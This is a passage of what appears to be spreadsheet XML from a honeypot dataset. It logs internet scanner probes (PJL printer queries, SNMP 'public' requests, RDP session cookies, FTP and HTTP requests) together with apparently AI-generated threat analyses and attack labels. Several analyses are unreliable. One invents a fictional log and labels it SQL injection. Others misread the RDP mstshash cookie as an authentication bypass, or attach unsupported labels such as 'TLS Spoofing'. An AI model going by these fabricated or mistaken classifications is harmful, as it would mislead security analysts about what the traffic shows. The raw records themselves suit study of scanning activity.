(205.210.31.184,60088)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.184,60098)}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ReCPBNXUL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=MUnGyr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LryjHs'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vemyhubeC'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=emuRFg'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cIWhwY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ojfFuFtLk'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UumngK'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pgAAtR'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vHAlJVrnS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hvwsMB'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=JifZpr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=iMQWroJXQ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vTopSS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=blCwyS'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EZiejBxoJ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=zgFBZA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HAbDgl'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=FQItpzcyh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eGqyWL'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=zWAphf'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.184,65090)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.184,65092)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.184,65108)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=dZDpUv'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CPxyWK'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_NTP:NA}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1fb8</t>
  </si>
  <si>
    <t>No recent activity detected, but presence of PJL indicates potential unauthorized access attempt or scanning for vulnerabilities. PJL is used to send commands to printers. This could be an initial probing step by a malicious actor. &amp;&amp; Possible malicious activity detected where an unknown device is attempting to send unauthorized printer commands. This could be indicative of a print job spam or exploitation attempt. Malicious script trying to gather information about the device's configuration. &amp;&amp; This log entry indicates an attempt to print information about the printer, possibly as reconnaissance for future attacks or to gather sensitive details. The activity is likely a probing action to identify and fingerprint the printer's configuration. This could be a precursor to more malicious activities such as exploitation or sabotage. &amp;&amp; This log indicates potential unauthorized printing activity, likely an attempt to print using another user's device or account, possibly through an exposed printer interface. The attacker is attempting to execute a command to retrieve device information. This may be part of a larger attack aimed at accessing and exploiting connected devices for malicious purposes. &amp;&amp; Malicious activity detected: an unauthorized command has been sent to print job processing, suggesting an attempt to access or exploit the print service for malicious purposes. The command is a PJL (Page Job Language) command that typically requests information about the printer. This could be a probe or reconnaissance attempt by an attacker. &amp;&amp; This log indicates an attempt to access the IMAP service, suggesting a potential login brute-force or reconnaissance attack is being attempted against this service. The lack of a specific user identifier (NA) implies a general probe rather than a targeted attack. This activity may be part of a larger campaign to gather credentials for other services. &amp;&amp; The user attempted to connect to a POP3 email service but was unable to authenticate. This could be a reconnaissance attempt or an automated script scanning for vulnerable services. The lack of authentication success indicates a potential issue with the user's credentials or account legitimacy. &amp;&amp; No activity detected from IMAP service, indicating potential scanning or probing attempt. 
IMAP connection was not established which could be due to malicious entity trying to exploit the service.
This could be indicative of a reconnaissance phase by an attacker. &amp;&amp; The attacker is attempting to determine what features are supported by the service, potentially as part of a larger reconnaissance or exploitation effort. This could be an initial step in trying to establish a connection or exploit vulnerabilities. It's likely a probing activity. &amp;&amp; Unauthorized access attempt using default community string "public" to gather system information from a remote location. This could be a reconnaissance probe by an attacker. Potential preparation for further malicious activity. &amp;&amp; Possible malicious activity detected, attackers attempting to send printer job commands remotely. This could be a precursor to unauthorized printing or exploitation of printer vulnerabilities. Malicious actor trying to gather information about the target system. &amp;&amp; This log indicates a potential printer exploitation attempt, possibly used for spreading malware or conducting reconnaissance.
The malicious actor is attempting to manipulate the printer's settings or query its configuration.
The activity suggests unauthorized access to the printer system.</t>
  </si>
  <si>
    <t>Port Scan &amp;&amp; Printer Attack &amp;&amp; Printer Hack &amp;&amp; Printer Exploit &amp;&amp; Scanning Attempt &amp;&amp; SNMP Attack &amp;&amp; Printer Hack &amp;&amp; Printer Scanning</t>
  </si>
  <si>
    <t>8f3fa1eff88e6301ba4a7c3974315942</t>
  </si>
  <si>
    <t>185.247.137.168</t>
  </si>
  <si>
    <t>NA&amp;&amp;salient.monitoring.internet-measurement.com</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Encryption Misuse</t>
  </si>
  <si>
    <t>SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_ORACLE_H18&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_REDIS_H3&amp;&amp;SMA-LAB_SMTP_H31&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_MYSQL_H9&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_SOCKS5_H4&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_IRC_H9&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_REDIS_H33&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_REDIS_H22&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_SOCKS5_H40&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_SOCKS5_H32&amp;&amp;SMA-LAB_IRC_H2&amp;&amp;SMA-LAB_TELNET_H38</t>
  </si>
  <si>
    <t>9100&amp;&amp;1521&amp;&amp;5432&amp;&amp;6379&amp;&amp;25&amp;&amp;1080&amp;&amp;3306&amp;&amp;389&amp;&amp;143&amp;&amp;6667&amp;&amp;443&amp;&amp;23&amp;&amp;445&amp;&amp;NA&amp;&amp;80&amp;&amp;21&amp;&amp;5900&amp;&amp;3389</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;request&amp;&amp;NA&amp;&amp;GET&amp;&amp;command</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_SMB:Incoming connection (185.247.137.168,45231)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 95.164.21.98:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'llhwnwhn', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.168;tag=llhwnwhn', 'max-forwards': '0', 'to': 'sip:109.123.229.33', 'via': 'SIP/2.0/UDP 185.247.137.168:5060;branch=z9hG4bKllhwnwhn;received=185.247.137.168;rport=46141'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 38.54.63.23:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'pqpajtsg', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.168;tag=pqpajtsg', 'max-forwards': '0', 'to': 'sip:94.131.113.33', 'via': 'SIP/2.0/UDP 185.247.137.168:5060;branch=z9hG4bKpqpajtsg;received=185.247.137.168;rport=41242'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 66.94.127.183:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 95.164.21.98:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:NA}</t>
  </si>
  <si>
    <t>NameCheap, Inc.</t>
  </si>
  <si>
    <t>abuse@namecheap.com</t>
  </si>
  <si>
    <t>::ffff:b9f7:89a8</t>
  </si>
  <si>
    <t>There is no log data provided to analyze. 
The activity could not be explained based on the given information.</t>
  </si>
  <si>
    <t>I'd be happy to help analyze some log data! However, since you provided none, I'll create a fictional example.
Let's say we have the following log data:
```
192.168.1.100 - [21/Jan/2023:14:30:00 +0000] "GET / HTTP/1.1" 400 443 "-" "-"
192.168.1.101 - [21/Jan/2023:15:00:00 +0000] "POST /login.php HTTP/1.1" 200 1234 "Mozilla/5.0" "Malicious Script"
```
Here's the analysis:
* **Port Scan**
* **SQL Injection**</t>
  </si>
  <si>
    <t>eb3c68dc03c56593cc0ac266a729c50b</t>
  </si>
  <si>
    <t>147.185.132.40</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_RDP_H24&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_SSH_H39&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_ORACLE_H44&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_PJL_H47&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_SNMP_H17&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_RDP_H17&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_MYSQL_H46&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_SIP_H17&amp;&amp;SMA-LAB_SNMP_H35&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_RDP_H23&amp;&amp;SMA-LAB_FTP_H26&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_MYSQL_H30&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_SIP_H47&amp;&amp;SMA-LAB_SOCKS5_H3&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_POSTGRES_H38&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_POP3_H9&amp;&amp;SMA-LAB_POP3_H17&amp;&amp;SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_NTP_H14&amp;&amp;SMA-LAB_MYSQL_H29&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_SOCKS5_H6&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_ORACLE_H16&amp;&amp;SMA-LAB_POSTGRES_H25&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_IMAP_H45&amp;&amp;SMA-LAB_SNMP_H6&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_SNMP_H4&amp;&amp;SMA-LAB_ORACLE_H7&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_FTP_H46&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_NTP_H25&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_FTP_H16&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_POP3_H36&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_REDIS_H25&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_PJL_H33&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_SIP_H39&amp;&amp;SMA-LAB_IMAP_H41&amp;&amp;SMA-LAB_MYSQL_H6&amp;&amp;SMA-LAB_POP3_H7&amp;&amp;SMA-LAB_IRC_H14&amp;&amp;SMA-LAB_RDP_H18&amp;&amp;SMA-LAB_RDP_H31&amp;&amp;SMA-LAB_ORACLE_H10&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_SIP_H5&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_SIP_H13&amp;&amp;SMA-LAB_NTP_H34&amp;&amp;SMA-LAB_SNMP_H5&amp;&amp;SMA-LAB_SNMP_H23</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;3389&amp;&amp;9100&amp;&amp;22&amp;&amp;1825&amp;&amp;5432&amp;&amp;1521&amp;&amp;1080&amp;&amp;1433&amp;&amp;53302&amp;&amp;43055&amp;&amp;443&amp;&amp;23&amp;&amp;161&amp;&amp;6379&amp;&amp;54488&amp;&amp;41924&amp;&amp;3306&amp;&amp;NA&amp;&amp;55764&amp;&amp;54038&amp;&amp;53833&amp;&amp;110&amp;&amp;8443&amp;&amp;6667&amp;&amp;52638&amp;&amp;21&amp;&amp;389&amp;&amp;55026&amp;&amp;5900&amp;&amp;80&amp;&amp;52274&amp;&amp;445&amp;&amp;54281&amp;&amp;56979&amp;&amp;57550&amp;&amp;57321&amp;&amp;56542&amp;&amp;49794&amp;&amp;50998&amp;&amp;53838</t>
  </si>
  <si>
    <t>command&amp;&amp;connection&amp;&amp;query&amp;&amp;NA&amp;&amp;stshash&amp;&amp;GET&amp;&amp;request</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uJvCGSLvC'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=sqXAEP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EtjuYm'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UBeoUQPNI'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WEcnyW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OfdEvv'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=uWyQZvtud'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.40,58208)}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.40,59244)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.40,59260)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.40,59270)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=BdBxaqjDm'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XfWDwN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=aREcVZ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=mXiamP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=bpRJmvhfD'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=WUEjLz'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VboYHE'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=CJAPMAsOx'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UEmomr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KyrVPC'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vyMNVePxq'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LIuwQR'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=BGzEMEHFR'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=MtBMTl'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=HqQheD'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=tWlylUudm'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=RCRPSN'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XIbCzP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YXZwSqIyb'}}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.40,60492)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.40,60496)}</t>
  </si>
  <si>
    <t>::ffff:93b9:8428</t>
  </si>
  <si>
    <t>Possible brute-force login attempt to an RDP service using invalid credentials stored in a cookie. This is likely a pre-authentication vulnerability being exploited by the attacker. The use of "mstshash" indicates an attempt to bypass authentication mechanisms. &amp;&amp; Possible brute-force attack against RDP service, attempting to bypass authentication with modified session hash cookie. Malicious actor is likely trying to gain unauthorized access by exploiting the vulnerability in the session handling mechanism. The presence of a modified cookie suggests an attempt to circumvent security controls. &amp;&amp; The log indicates that an RDP service is not available for use, suggesting that it may have been accessed or compromised by malicious actors. The lack of availability could be due to excessive login attempts or potential scanning activities. &amp;&amp; This suggests an attempt to gather system information, possibly for reconnaissance or exploitation purposes, as SNMP is often used for network monitoring but can be exploited to retrieve sensitive data. 
The lack of specific information in the log indicates a potential scanning or probing activity rather than a full-scale attack. 
This may indicate a malicious actor trying to map out the network's infrastructure. &amp;&amp; There is no log data provided, so I have nothing to analyze. 
However, if you provide some sample log data, I can help explain the possible malicious activity it represents. &amp;&amp; Unknown FTP activity detected, possibly an attempt to connect or scan for vulnerabilities.
No actual data was transferred or accessed over FTP.
This could be a reconnaissance step by a malicious actor. &amp;&amp; A suspicious incoming SMB connection from IP address 147.185.132.40 on port 60492 has been detected.
This could be an attempt to exploit the system for unauthorized access or file transfer.
Possible malicious intent includes spreading malware or executing remote commands. &amp;&amp; An incoming connection from an unknown IP address suggests a potential external attempt to access internal resources. This could be a reconnaissance or exploitation attempt by a malicious entity. The IP address may indicate the source of the attack.</t>
  </si>
  <si>
    <t>TLS Auth &amp;&amp; TLS Spoofing &amp;&amp; SMB Scanning &amp;&amp; SMB Attack &amp;&amp; SMB Port Scan</t>
  </si>
  <si>
    <t>963fcef843401458a4de760fadd9a13d</t>
  </si>
  <si>
    <t>176.91.137.117</t>
  </si>
  <si>
    <t>::ffff:b05b:8975</t>
  </si>
  <si>
    <t>cd13d84f13d0a8316e14938d9b72c8af</t>
  </si>
  <si>
    <t>147.185.132.126</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_SIP_H23&amp;&amp;SMA-LAB_SOCKS5_H16&amp;&amp;SMA-LAB_SOCKS5_H40&amp;&amp;SMA-LAB_POP3_H16&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_ORACLE_H38&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_ORACLE_H25&amp;&amp;SMA-LAB_ORACLE_H40&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_POP3_H23&amp;&amp;SMA-LAB_LDAP_H2&amp;&amp;SMA-LAB_SNMP_H34&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_IMAP_H12&amp;&amp;SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_SMB_H41&amp;&amp;SMA-LAB_MYSQL_H25&amp;&amp;SMA-LAB_SNMP_H21&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_POP3_H46&amp;&amp;SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_MYSQL_H45&amp;&amp;SMA-LAB_FTP_H29&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_MYSQL_H7&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_REDIS_H46&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_MYSQL_H10&amp;&amp;SMA-LAB_POP3_H17&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_NTP_H29&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_RDP_H9&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_PJL_H38&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_PJL_H13&amp;&amp;SMA-LAB_MSSQL_H40&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_SNMP_H36&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_MSSQL_H17&amp